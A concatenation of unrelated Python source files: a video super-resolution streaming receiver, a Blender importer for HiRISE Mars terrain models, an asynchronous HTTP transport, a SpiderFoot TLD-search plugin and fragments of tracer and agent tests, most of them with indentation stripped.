aea_handler.handled_message.performative
== HttpMessage.Performative.RESPONSE
)
assert aea_handler.handled_message.version == ""
assert aea_handler.handled_message.status_code == 200
assert aea_handler.handled_message.status_text == "OK"
assert aea_handler.handled_message.headers is not None
assert aea_handler.handled_message.version is not None
finally:
aea.stop()
t_aea.join()
@classmethod
def teardown_class(cls):
# terminate the ACA
cls.process.terminate()
class AEAHandler(Handler):
"""The handler for the AEA."""
SUPPORTED_PROTOCOL = HttpMessage.protocol_id # type: Optional[ProtocolId]
def __init__(self, **kwargs):
"""Initialize the handler."""
super().__init__(**kwargs)
self.kwargs = kwargs
self.handled_message = None
def setup(self) -> None:
"""Implement the setup for the handler."""
pass
def handle(self, message: Message) -> None:
"""
Implement the reaction to a message.
:param message: the message
:return: None
"""
self.handled_message = message
def teardown(self) -> None:
"""
Implement the handler teardown.
:return: None
"""
|
receiver.py
|
import queue
import threading
import cv2
from enhancer import Enhancer
import numpy as np
from tensorflow import keras
import time
from stream import Streamer
output_dir = 'frames'
q = queue.Queue()
q_out = queue.Queue()
# model = keras.models.load_model('models/generator.h5')
# inputs = keras.Input((None, None, 3))
# output = model(inputs)
# model = keras.models.Model(inputs, output)
stream_addr = 'videoplayback.mp4'  # e.g. 'rtmp://192.168.1.7/live/test'
while True:
cap = cv2.VideoCapture(stream_addr)
if cap.isOpened():
break
else:
time.sleep(0.3)
width = 640*3
height = 360*3
fps = 30.
stream = Streamer(height, width, fps)
enhancer = Enhancer()
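# Pipeline: read() decodes frames from the capture into q, enhance() runs the
# super-resolution model and puts results into q_out, and send() hands the
# enhanced frames to the outgoing stream; each stage runs in its own thread below.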
def read():
    # Reader thread: decode frames and push RGB copies onto the input queue.
    while True:
        ret, frame = cap.read()
        if not ret:
            # End of stream or read failure: stop reading so the capture can be released.
            break
        im_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        q.put(im_rgb)
    cap.release()
def enhance():
    # Enhancer thread: block until a frame is available, upscale it, queue the result.
    while True:
        frame = q.get()
        print("Q: %d" % q.qsize())
        sr = enhancer.enhance(frame)
        q_out.put(sr)
        q.task_done()
def send():
    # Sender thread: block until an enhanced frame is available and hand it to the streamer.
    # (Original pacing condition, kept for reference:
    #  stream.get_video_frame_buffer_state() < fps and q_out.qsize() > 0)
    i = 0
    while True:
        frame = q_out.get()
        print("Q_OUT: %d" % q_out.qsize())
        stream.send_video_frame(frame, frame_counter=None)
        i += 1
        q_out.task_done()
r = threading.Thread(name='read', target=read)
e = threading.Thread(name='enhance', target=enhance)
s = threading.Thread(name='send', target=send)
r.start()
e.start()
s.start()
|
import_img.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This script can import a HiRISE DTM .IMG file.
"""
import bpy
from bpy.props import *
from struct import pack, unpack
import os
import queue, threading
class image_props:
''' keeps track of image attributes throughout the hirise_dtm_helper class '''
def __init__(self, name, dimensions, pixel_scale):
self.name( name )
self.dims( dimensions )
self.processed_dims( dimensions )
self.pixel_scale( pixel_scale )
def dims(self, dims=None):
if dims is not None:
self.__dims = dims
return self.__dims
def processed_dims(self, processed_dims=None):
if processed_dims is not None:
self.__processed_dims = processed_dims
return self.__processed_dims
def name(self, name=None):
if name is not None:
self.__name = name
return self.__name
def pixel_scale(self, pixel_scale=None):
if pixel_scale is not None:
self.__pixel_scale = pixel_scale
return self.__pixel_scale
class hirise_dtm_helper(object):
''' methods to understand/import a HiRISE DTM formatted as a PDS .IMG '''
def __init__(self, context, filepath):
self.__context = context
self.__filepath = filepath
self.__ignore_value = 0x00000000
self.__bin_mode = 'BIN6'
self.scale( 1.0 )
self.__cropXY = False
self.marsRed(False)
def bin_mode(self, bin_mode=None):
        if bin_mode is not None:
self.__bin_mode = bin_mode
return self.__bin_mode
def scale(self, scale=None):
if scale is not None:
self.__scale = scale
return self.__scale
def crop(self, widthX, widthY, offX, offY):
self.__cropXY = [ widthX, widthY, offX, offY ]
return self.__cropXY
def marsRed(self, marsRed=None):
if marsRed is not None:
self.__marsRed = marsRed
return self.__marsRed
def dbg(self, mesg):
print(mesg)
############################################################################
## PDS Label Operations
############################################################################
def parsePDSLabel(self, labelIter, currentObjectName=None, level = ""):
# Let's parse this thing... semi-recursively
## I started writing this caring about everything in the PDS standard but ...
## it's a mess and I only need a few things -- thar be hacks below
## Mostly I just don't care about continued data from previous lines
label_structure = []
# When are we done with this level?
endStr = "END"
        if currentObjectName is not None:
endStr = "END_OBJECT = %s" % currentObjectName
line = ""
while not line.rstrip() == endStr:
line = next(labelIter)
# Get rid of comments
comment = line.find("/*")
if comment > -1:
line = line[:comment]
# Take notice of objects
if line[:8] == "OBJECT =":
objName = line[8:].rstrip()
label_structure.append(
(
objName.lstrip().rstrip(),
self.parsePDSLabel(labelIter, objName.lstrip().rstrip(), level + " ")
)
)
elif line.find("END_OBJECT =") > -1:
pass
elif len(line.rstrip().lstrip()) > 0:
                key_val = line.split(" = ", 1)  # split on the first " = " only, so values may themselves contain " = "
if len(key_val) == 2:
label_structure.append( (key_val[0].rstrip().lstrip(), key_val[1].rstrip().lstrip()) )
return label_structure
# There has got to be a better way in python?
def iterArr(self, label):
for line in label:
yield line
def getPDSLabel(self, img):
# Just takes file and stores it into an array for later use
label = []
        done = False
# Grab label into array of lines
while not done:
line = str(img.readline(), 'utf-8')
if line.rstrip() == "END":
done = True
label.append(line)
return (label, self.parsePDSLabel(self.iterArr(label)))
def getLinesAndSamples(self, label):
''' uses the parsed PDS Label to get the LINES and LINE_SAMPLES parameters
from the first object named "IMAGE" -- is hackish
'''
lines = None
line_samples = None
for obj in label:
if obj[0] == "IMAGE":
return self.getLinesAndSamples(obj[1])
if obj[0] == "LINES":
lines = int(obj[1])
if obj[0] == "LINE_SAMPLES":
line_samples = int(obj[1])
return ( line_samples, lines )
def getValidMinMax(self, label):
''' uses the parsed PDS Label to get the VALID_MINIMUM and VALID_MAXIMUM parameters
from the first object named "IMAGE" -- is hackish
'''
for obj in label:
if obj[0] == "IMAGE":
return self.getValidMinMax(obj[1])
if obj[0] == "VALID_MINIMUM":
vmin = float(obj[1])
if obj[0] == "VALID_MAXIMUM":
vmax = float(obj[1])
return vmin, vmax
def getMissingConstant(self, label):
''' uses the parsed PDS Label to get the MISSING_CONSTANT parameter
from the first object named "IMAGE" -- is hackish
'''
for obj in label:
if obj[0] == "IMAGE":
return self.getMissingConstant(obj[1])
if obj[0] == "MISSING_CONSTANT":
bit_string_repr = obj[1]
# This is always the same for a HiRISE image, so we are just checking it
# to be a little less insane here. If someone wants to support another
# constant then go for it. Just make sure this one continues to work too
pieces = bit_string_repr.split("#")
if pieces[0] == "16" and pieces[1] == "FF7FFFFB":
ignore_value = unpack("f", pack("I", 0xFF7FFFFB))[0]
return ( ignore_value )
############################################################################
## Image operations
############################################################################
# decorator to run a generator in a thread
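    # Each image-processing stage below (getImage, bin2/bin6/bin12, cropXY,
    # shiftToOrigin, scaleZ) is wrapped with this decorator, so the stages run in
    # their own threads and pass lines to each other through a Queue instead of
    # running strictly in sequence.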
def threaded_generator(func):
def start(*args,**kwargs):
# Setup a queue of returned items
yield_q = queue.Queue()
# Thread to run generator inside of
def worker():
for obj in func(*args,**kwargs): yield_q.put(obj)
yield_q.put(StopIteration)
t = threading.Thread(target=worker)
t.start()
# yield from the queue as fast as we can
obj = yield_q.get()
while obj is not StopIteration:
yield obj
obj = yield_q.get()
# return the thread-wrapped generator
return start
@threaded_generator
def bin2(self, image_iter, bin2_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//2, processed_dims[1]//2 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*2, pixel_scale[1]*2 )
img_props.pixel_scale( pixel_scale )
yield img_props
# Take two lists [a1, a2, a3], [b1, b2, b3] and combine them into one
# list of [a1 + b1, a2+b2, ... ] as long as both values are not ignorable
        combine_fun = lambda a, b: a + b if a != self.__ignore_value and b != self.__ignore_value else self.__ignore_value
line_count = 0
ret_list = []
for line in image_iter:
if line_count == 1:
line_count = 0
tmp_list = list(map(combine_fun, line, last_line))
while len(tmp_list) > 1:
ret_list.append( combine_fun( tmp_list[0], tmp_list[1] ) )
del tmp_list[0:2]
yield ret_list
ret_list = []
            last_line = line  # remember this line so the next line can be combined with it
line_count += 1
@threaded_generator
def bin6(self, image_iter, bin6_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//6, processed_dims[1]//6 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*6, pixel_scale[1]*6 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin6_method_type == "FAST":
bin6_method = self.bin6_real_fast
else:
bin6_method = self.bin6_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 6:
yield bin6_method( raw_data )
line_count = 0
raw_data = []
def bin6_real(self, raw_data):
''' does a 6x6 sample of raw_data and returns a single line of data '''
# TODO: make this more efficient
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//6):
ints = list(filter( filter_fun, raw_data[0][base:base+6] +
raw_data[1][base:base+6] +
raw_data[2][base:base+6] +
raw_data[3][base:base+6] +
raw_data[4][base:base+6] +
raw_data[5][base:base+6] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 6
return binned_data
def bin6_real_fast(self, raw_data):
''' takes a single value from each 6x6 sample of raw_data and returns a single line of data '''
# TODO: make this more efficient
binned_data = []
base = 0
for i in range(0, len(raw_data[0])//6):
binned_data.append( raw_data[0][base] )
base += 6
return binned_data
@threaded_generator
def bin12(self, image_iter, bin12_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//12, processed_dims[1]//12 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*12, pixel_scale[1]*12 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin12_method_type == "FAST":
bin12_method = self.bin12_real_fast
else:
bin12_method = self.bin12_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 12:
yield bin12_method( raw_data )
line_count = 0
raw_data = []
def bin12_real(self, raw_data):
''' does a 12x12 sample of raw_data and returns a single line of data '''
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//12):
ints = list(filter( filter_fun, raw_data[0][base:base+12] +
raw_data[1][base:base+12] +
raw_data[2][base:base+12] +
raw_data[3][base:base+12] +
raw_data[4][base:base+12] +
raw_data[5][base:base+12] +
raw_data[6][base:base+12] +
raw_data[7][base:base+12] +
raw_data[8][base:base+12] +
raw_data[9][base:base+12] +
raw_data[10][base:base+12] +
raw_data[11][base:base+12] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 12
return binned_data
def bin12_real_fast(self, raw_data):
''' takes a single value from each 12x12 sample of raw_data and returns a single line of data '''
return raw_data[0][11::12]
@threaded_generator
def cropXY(self, image_iter, XSize=None, YSize=None, XOffset=0, YOffset=0):
''' return a cropped portion of the image '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
if XSize is None:
XSize = processed_dims[0]
if YSize is None:
YSize = processed_dims[1]
if XSize + XOffset > processed_dims[0]:
self.dbg("WARNING: Upstream dims are larger than cropped XSize dim")
XSize = processed_dims[0]
XOffset = 0
if YSize + YOffset > processed_dims[1]:
self.dbg("WARNING: Upstream dims are larger than cropped YSize dim")
YSize = processed_dims[1]
YOffset = 0
img_props.processed_dims( (XSize, YSize) )
yield img_props
currentY = 0
for line in image_iter:
if currentY >= YOffset and currentY <= YOffset + YSize:
yield line[XOffset:XOffset+XSize]
# Not much point in reading the rest of the data...
if currentY == YOffset + YSize:
return
currentY += 1
@threaded_generator
def getImage(self, img, img_props):
''' Assumes 32-bit pixels -- bins image '''
dims = img_props.dims()
self.dbg("getting image (x,y): %d,%d" % ( dims[0], dims[1] ))
# setup to unpack more efficiently.
x_len = dims[0]
# little endian (PC_REAL)
unpack_str = "<"
# unpack_str = ">"
unpack_bytes_str = "<"
pack_bytes_str = "="
# 32 bits/sample * samples/line = y_bytes (per line)
x_bytes = 4*x_len
for x in range(0, x_len):
            # 32-bit float is "f" ("d" would be a 64-bit double)
unpack_str += "f"
unpack_bytes_str += "I"
pack_bytes_str += "I"
# Each iterator yields this first ... it is for reference of the next iterator:
yield img_props
for y in range(0, dims[1]):
# pixels is a byte array
pixels = b''
while len(pixels) < x_bytes:
new_pixels = img.read( x_bytes - len(pixels) )
pixels += new_pixels
if len(new_pixels) == 0:
x_bytes = -1
pixels = []
self.dbg("Uh oh: unexpected EOF!")
if len(pixels) == x_bytes:
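                # Disabled debug branch below: when enabled it repacks each 32-bit word
                # into native byte order before interpreting the line as floats.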
if 0 == 1:
repacked_pixels = b''
for integer in unpack(unpack_bytes_str, pixels):
repacked_pixels += pack("=I", integer)
yield unpack( unpack_str, repacked_pixels )
else:
yield unpack( unpack_str, pixels )
@threaded_generator
def shiftToOrigin(self, image_iter, image_min_max):
''' takes a generator and shifts the points by the valid minimum
also removes points with value self.__ignore_value and replaces them with None
'''
# use the passed in values ...
valid_min = image_min_max[0]
# pass on dimensions/pixel_scale since we don't modify them here
yield next(image_iter)
self.dbg("shiftToOrigin filter enabled...");
# closures rock!
def normalize_fun(point):
if point == self.__ignore_value:
return None
return point - valid_min
for line in image_iter:
yield list(map(normalize_fun, line))
self.dbg("shifted all points")
@threaded_generator
def scaleZ(self, image_iter, scale_factor):
''' scales the mesh values by a factor '''
# pass on dimensions since we don't modify them here
yield next(image_iter)
scale_factor = self.scale()
def scale_fun(point):
try:
return point * scale_factor
except:
return None
for line in image_iter:
yield list(map(scale_fun, line))
def genMesh(self, image_iter):
'''Returns a mesh object from an image iterator this has the
value-added feature that a value of "None" is ignored
'''
# Get the output image size given the above transforms
img_props = next(image_iter)
# Let's interpolate the binned DTM with blender -- yay meshes!
coords = []
faces = []
face_count = 0
coord = -1
max_x = img_props.processed_dims()[0]
max_y = img_props.processed_dims()[1]
scale_x = self.scale() * img_props.pixel_scale()[0]
scale_y = self.scale() * img_props.pixel_scale()[1]
line_count = 0
# seed the last line (or previous line) with a line
last_line = next(image_iter)
point_offset = 0
previous_point_offset = 0
# Let's add any initial points that are appropriate
x = 0
point_offset += len( last_line ) - last_line.count(None)
for z in last_line:
if z != None:
coords.extend([x*scale_x, 0.0, z])
coord += 1
x += 1
# We want to ignore points with a value of "None" but we also need to create vertices
# with an index that we can re-create on the next line. The solution is to remember
# two offsets: the point offset and the previous point offset.
# these offsets represent the point index that blender gets -- not the number of
# points we have read from the image
# if "x" represents points that are "None" valued then conceptually this is how we
# think of point indices:
#
# previous line: offset0 x x +1 +2 +3
# current line: offset1 x +1 +2 +3 x
# once we can map points we can worry about making triangular or square faces to fill
# the space between vertices so that blender is more efficient at managing the final
# structure.
self.dbg('generate mesh coords/faces from processed image data...')
# read each new line and generate coordinates+faces
for dtm_line in image_iter:
# Keep track of where we are in the image
line_count += 1
y_val = line_count*-scale_y
if line_count % 31 == 0:
self.dbg("reading image... %d of %d" % ( line_count, max_y ))
# Just add all points blindly
# TODO: turn this into a map
x = 0
for z in dtm_line:
if z != None:
coords.extend( [x*scale_x, y_val, z] )
coord += 1
x += 1
# Calculate faces
for x in range(0, max_x - 1):
vals = [
last_line[ x + 1 ],
last_line[ x ],
dtm_line[ x ],
dtm_line[ x + 1 ],
]
# Two or more values of "None" means we can ignore this block
none_val = vals.count(None)
# Common case: we can create a square face
if none_val == 0:
faces.extend( [
previous_point_offset,
previous_point_offset+1,
point_offset+1,
point_offset,
] )
face_count += 1
elif none_val == 1:
# special case: we can implement a triangular face
## NB: blender 2.5 makes a triangular face when the last coord is 0
# TODO: implement a triangular face
pass
if vals[1] != None:
previous_point_offset += 1
if vals[2] != None:
point_offset += 1
# Squeeze the last point offset increment out of the previous line
if last_line[-1] != None:
previous_point_offset += 1
# Squeeze the last point out of the current line
if dtm_line[-1] != None:
point_offset += 1
# remember what we just saw (and forget anything before that)
last_line = dtm_line
self.dbg('generate mesh from coords/faces...')
me = bpy.data.meshes.new(img_props.name()) # create a new mesh
self.dbg('coord: %d' % coord)
self.dbg('len(coords): %d' % len(coords))
self.dbg('len(faces): %d' % len(faces))
self.dbg('setting coords...')
        me.vertices.add(len(coords) // 3)  # three floats per vertex; add() needs an int
me.vertices.foreach_set("co", coords)
self.dbg('setting faces...')
        me.faces.add(len(faces) // 4)  # four indices per face; add() needs an int
me.faces.foreach_set("vertices_raw", faces)
self.dbg('running update...')
me.update()
bin_desc = self.bin_mode()
if bin_desc == 'NONE':
bin_desc = 'No Bin'
ob=bpy.data.objects.new("DTM - %s" % bin_desc, me)
return ob
def marsRedMaterial(self):
''' produce some approximation of a mars surface '''
mat = None
for material in bpy.data.materials:
if material.getName() == "redMars":
mat = material
if mat is None:
mat = bpy.data.materials.new("redMars")
mat.diffuse_shader = 'MINNAERT'
mat.setRGBCol( (0.426, 0.213, 0.136) )
mat.setDiffuseDarkness(0.8)
mat.specular_shader = 'WARDISO'
mat.setSpecCol( (1.000, 0.242, 0.010) )
mat.setSpec( 0.010 )
mat.setRms( 0.100 )
return mat
################################################################################
# Yay, done with helper functions ... let's see the abstraction in action! #
################################################################################
def execute(self):
self.dbg('opening/importing file: %s' % self.__filepath)
img = open(self.__filepath, 'rb')
self.dbg('read PDS Label...')
(label, parsedLabel) = self.getPDSLabel(img)
self.dbg('parse PDS Label...')
image_dims = self.getLinesAndSamples(parsedLabel)
img_min_max_vals = self.getValidMinMax(parsedLabel)
self.__ignore_value = self.getMissingConstant(parsedLabel)
self.dbg('import/bin image data...')
# MAGIC VALUE? -- need to formalize this to rid ourselves of bad points
img.seek(28)
# Crop off 4 lines
img.seek(4*image_dims[0])
# HiRISE images (and most others?) have 1m x 1m pixels
pixel_scale=(1, 1)
# The image we are importing
image_name = os.path.basename( self.__filepath )
# Set the properties of the image in a manageable object
img_props = image_props( image_name, image_dims, pixel_scale )
# Get an iterator to iterate over lines
image_iter = self.getImage(img, img_props)
## Wrap the image_iter generator with other generators to modify the dtm on a
## line-by-line basis. This creates a stream of modifications instead of reading
## all of the data at once, processing all of the data (potentially several times)
## and then handing it off to blender
## TODO: find a way to alter projection based on transformations below
if self.__cropXY:
image_iter = self.cropXY(image_iter,
XSize=self.__cropXY[0],
YSize=self.__cropXY[1],
XOffset=self.__cropXY[2],
YOffset=self.__cropXY[3]
)
# Select an appropriate binning mode
## TODO: generalize the binning fn's
bin_mode = self.bin_mode()
bin_mode_funcs = {
'BIN2': self.bin2(image_iter),
'BIN6': self.bin6(image_iter),
'BIN6-FAST': self.bin6(image_iter, 'FAST'),
'BIN12': self.bin12(image_iter),
'BIN12-FAST': self.bin12(image_iter, 'FAST')
}
if bin_mode in bin_mode_funcs.keys():
image_iter = bin_mode_funcs[ bin_mode ]
image_iter = self.shiftToOrigin(image_iter, img_min_max_vals)
        if self.scale() != 1.0:
image_iter = self.scaleZ(image_iter, img_min_max_vals)
# Create a new mesh object and set data from the image iterator
self.dbg('generating mesh object...')
ob_new = self.genMesh(image_iter)
if self.marsRed():
mars_red = self.marsRedMaterial()
ob_new.materials += [mars_red]
if img:
img.close()
# Add mesh object to the current scene
scene = self.__context.scene
self.dbg('linking object to scene...')
scene.objects.link(ob_new)
scene.update()
# deselect other objects
bpy.ops.object.select_all(action='DESELECT')
# scene.objects.active = ob_new
# Select the new mesh
ob_new.select = True
self.dbg('done with ops ... now wait for blender ...')
return ('FINISHED',)
def load(operator, context, filepath, scale, bin_mode, cropVars, marsRed):
print("Bin Mode: %s" % bin_mode)
print("Scale: %f" % scale)
helper = hirise_dtm_helper(context,filepath)
helper.bin_mode( bin_mode )
helper.scale( scale )
if cropVars:
helper.crop( cropVars[0], cropVars[1], cropVars[2], cropVars[3] )
    if marsRed:
        helper.marsRed(marsRed)
    helper.execute()
print("Loading %s" % filepath)
return {'FINISHED'}
|
transport.py
|
"""
track.transport
~~~~~~~~~~~~~~~
:copyright: (c) 2013 Simon Zimmermann.
:copyright: (c) 2010-2012 by the Sentry Team.
"""
from __future__ import absolute_import
import atexit
import logging
import os
import requests
import threading
import time
from .compat import Queue
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('track.errors')
class AsyncWorker(object):
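    """Runs queued (callback, args, kwargs) jobs on a daemon thread; used for asynchronous HTTP sends."""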
_terminator = object()
def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
self._queue = Queue(-1)
self._lock = threading.Lock()
self._thread = None
self.options = {
'shutdown_timeout': shutdown_timeout,
}
self.start()
def main_thread_terminated(self):
size = self._queue.qsize()
if size:
timeout = self.options['shutdown_timeout']
print("Sentry is attempting to send %s pending error messages" % size)
print("Waiting up to %s seconds" % timeout)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
self.stop(timeout=timeout)
def start(self):
"""
Starts the task thread.
"""
self._lock.acquire()
try:
if not self._thread:
self._thread = threading.Thread(target=self._target)
                self._thread.daemon = True
self._thread.start()
finally:
self._lock.release()
atexit.register(self.main_thread_terminated)
def stop(self, timeout=None):
"""
Stops the task thread. Synchronous!
"""
self._lock.acquire()
try:
if self._thread:
self._queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def queue(self, callback, *args, **kwargs):
self._queue.put_nowait((callback, args, kwargs))
def _target(self):
while 1:
record = self._queue.get()
if record is self._terminator:
break
callback, args, kwargs = record
try:
callback(*args, **kwargs)
except Exception:
logger.error('Failed processing job', exc_info=True)
time.sleep(0)
class Response(object):
def __init__(self, res):
self._obj = res
def __getattr__(self, attrib):
return getattr(self._obj, attrib)
def has_data(self):
if not hasattr(self, '_has_data'):
content_length = self.headers.get('Content-Length')
if content_length:
self._has_data = int(content_length) > 0
else:
self._has_data = len(self.content) > 0
return self._has_data
def data(self):
if not self.has_data():
return ''
        if 'application/json' in (self.headers.get('Content-Type') or ''):
return self.json()
return self.content
class HTTPTransport(object):
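    """Synchronous transport: send() issues the HTTP request inline via the requests library."""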
asyncronous = False
def __init__(self, keep_alive=False, timeout=None):
self.keep_alive = keep_alive
self.timeout = timeout or 1.0
def client(self):
if self.keep_alive:
if not hasattr(self, '_session'):
self._session = requests.session()
return self._session
return requests
def send_sync(self, url, method, data=None, params=None, headers=None, files=None, success_cb=None, failure_cb=None):
try:
httpclient = getattr(self.client(), method.lower())
rv = httpclient(url, params=params, data=data, headers=headers, files=files, timeout=self.timeout)
rv.raise_for_status()
res = Response(rv)
if success_cb:
success_cb(res)
return res
except requests.HTTPError as ex:
ex.response = Response(ex.response)
if failure_cb:
failure_cb(ex)
raise ex
except Exception as ex:
if failure_cb:
failure_cb(ex)
raise ex
send = send_sync
class ThreadedHTTPTransport(HTTPTransport):
asyncronous = True
def get_worker(self):
if not hasattr(self, '_worker'):
self._worker = AsyncWorker()
return self._worker
def send(self, url, method, data=None, params=None, headers=None, success_cb=None, failure_cb=None):
self.get_worker().queue(self.send_sync, url, method, data=data, params=params, headers=headers, success_cb=success_cb, failure_cb=failure_cb)
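# Illustrative usage sketch (hedged -- the endpoint and payload below are placeholders):
#
#   transport = ThreadedHTTPTransport()
#   transport.send("https://example.invalid/api/track", "POST",
#                  data=b"{}", headers={"Content-Type": "application/json"})
#   # the request runs on the AsyncWorker's daemon thread; success_cb/failure_cb fire there too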
|
sfp_tldsearch.py
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_tldsearch
# Purpose: SpiderFoot plug-in for identifying the existence of this target
# on other TLDs.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 31/08/2013
# Copyright: (c) Steve Micallef 2013
# Licence: MIT
# -------------------------------------------------------------------------------
import random
import threading
import time
import dns.resolver
from spiderfoot import SpiderFootEvent, SpiderFootPlugin
class sfp_tldsearch(SpiderFootPlugin):
meta = {
'name': "TLD Searcher",
'summary': "Search all Internet TLDs for domains with the same name as the target (this can be very slow.)",
'flags': ["slow"],
'useCases': ["Footprint"],
'categories': ["DNS"]
}
# Default options
opts = {
'activeonly': False, # Only report domains that have content (try to fetch the page)
'skipwildcards': True,
'_maxthreads': 50
}
# Option descriptions
optdescs = {
'activeonly': "Only report domains that have content (try to fetch the page)?",
"skipwildcards": "Skip TLDs and sub-TLDs that have wildcard DNS.",
"_maxthreads": "Maximum threads"
}
# Internal results tracking
results = None
# Track TLD search results between threads
tldResults = dict()
lock = None
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.results = self.tempStorage()
self.__dataSource__ = "DNS"
self.lock = threading.Lock()
for opt in list(userOpts.keys()):
self.opts[opt] = userOpts[opt]
# What events is this module interested in for input
def watchedEvents(self):
return ["INTERNET_NAME"]
# What events this module produces
# This is to support the end user in selecting modules based on events
# produced.
def producedEvents(self):
return ["SIMILARDOMAIN"]
def tryTld(self, target, tld):
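        """Resolve one candidate domain and record the outcome in self.tldResults under the shared lock."""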
resolver = dns.resolver.Resolver()
resolver.timeout = 1
resolver.lifetime = 1
resolver.search = list()
if self.opts.get('_dnsserver', "") != "":
resolver.nameservers = [self.opts['_dnsserver']]
if self.opts['skipwildcards'] and self.sf.checkDnsWildcard(tld):
return
try:
if not self.sf.resolveHost(target) and not self.sf.resolveHost6(target):
with self.lock:
self.tldResults[target] = False
else:
with self.lock:
self.tldResults[target] = True
except Exception:
with self.lock:
self.tldResults[target] = False
def tryTldWrapper(self, tldList, sourceEvent):
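        """Spawn one thread per (domain, tld) pair, wait for all of them to finish, then emit events for resolvable domains."""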
self.tldResults = dict()
running = True
t = []
# Spawn threads for scanning
self.info(f"Spawning threads to check TLDs: {tldList}")
for i, pair in enumerate(tldList):
(domain, tld) = pair
tn = 'thread_sfp_tldsearch_' + str(random.SystemRandom().randint(0, 999999999))
t.append(threading.Thread(name=tn, target=self.tryTld, args=(domain, tld,)))
t[i].start()
# Block until all threads are finished
while running:
found = False
for rt in threading.enumerate():
if rt.name.startswith("thread_sfp_tldsearch_"):
found = True
if not found:
running = False
time.sleep(0.1)
for res in self.tldResults:
if self.tldResults[res] and res not in self.results:
self.sendEvent(sourceEvent, res)
# Store the result internally and notify listening modules
def sendEvent(self, source, result):
self.info("Found a TLD with the target's name: " + result)
self.results[result] = True
# Inform listening modules
if self.opts['activeonly']:
if self.checkForStop():
return
pageContent = self.sf.fetchUrl('http://' + result,
timeout=self.opts['_fetchtimeout'],
useragent=self.opts['_useragent'],
noLog=True,
verify=False)
if pageContent['content'] is not None:
evt = SpiderFootEvent("SIMILARDOMAIN", result, self.__name__, source)
self.notifyListeners(evt)
else:
evt = SpiderFootEvent("SIMILARDOMAIN", result, self.__name__, source)
self.notifyListeners(evt)
# Search for similar sounding domains
def handleEvent(self, event):
eventData = event.data
if eventData in self.results:
return
self.results[eventData] = True
keyword = self.sf.domainKeyword(eventData, self.opts['_internettlds'])
if not keyword:
self.error(f"Failed to extract keyword from {eventData}")
return
self.debug(f"Keyword extracted from {eventData}: {keyword}")
if keyword in self.results:
return
self.results[keyword] = True
# Look through all TLDs for the existence of this target keyword
targetList = list()
for tld in self.opts['_internettlds']:
if type(tld) != str:
tld = str(tld.strip(), errors='ignore')
else:
tld = tld.strip()
if tld.startswith("//") or len(tld) == 0:
continue
if tld.startswith("!") or tld.startswith("*") or tld.startswith(".."):
continue
if tld.endswith(".arpa"):
continue
tryDomain = keyword + "." + tld
if self.checkForStop():
return
if len(targetList) <= self.opts['_maxthreads']:
targetList.append([tryDomain, tld])
else:
self.tryTldWrapper(targetList, event)
targetList = list()
# Scan whatever may be left over.
if len(targetList) > 0:
self.tryTldWrapper(targetList, event)
# End of sfp_tldsearch class
|
test_tracer.py
|
import time
import mock
import opentracing
from opentracing import Format
from opentracing import InvalidCarrierException
from opentracing import SpanContextCorruptedException
from opentracing import UnsupportedFormatException
from opentracing import child_of
import pytest
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer
from ddtrace.opentracer import set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
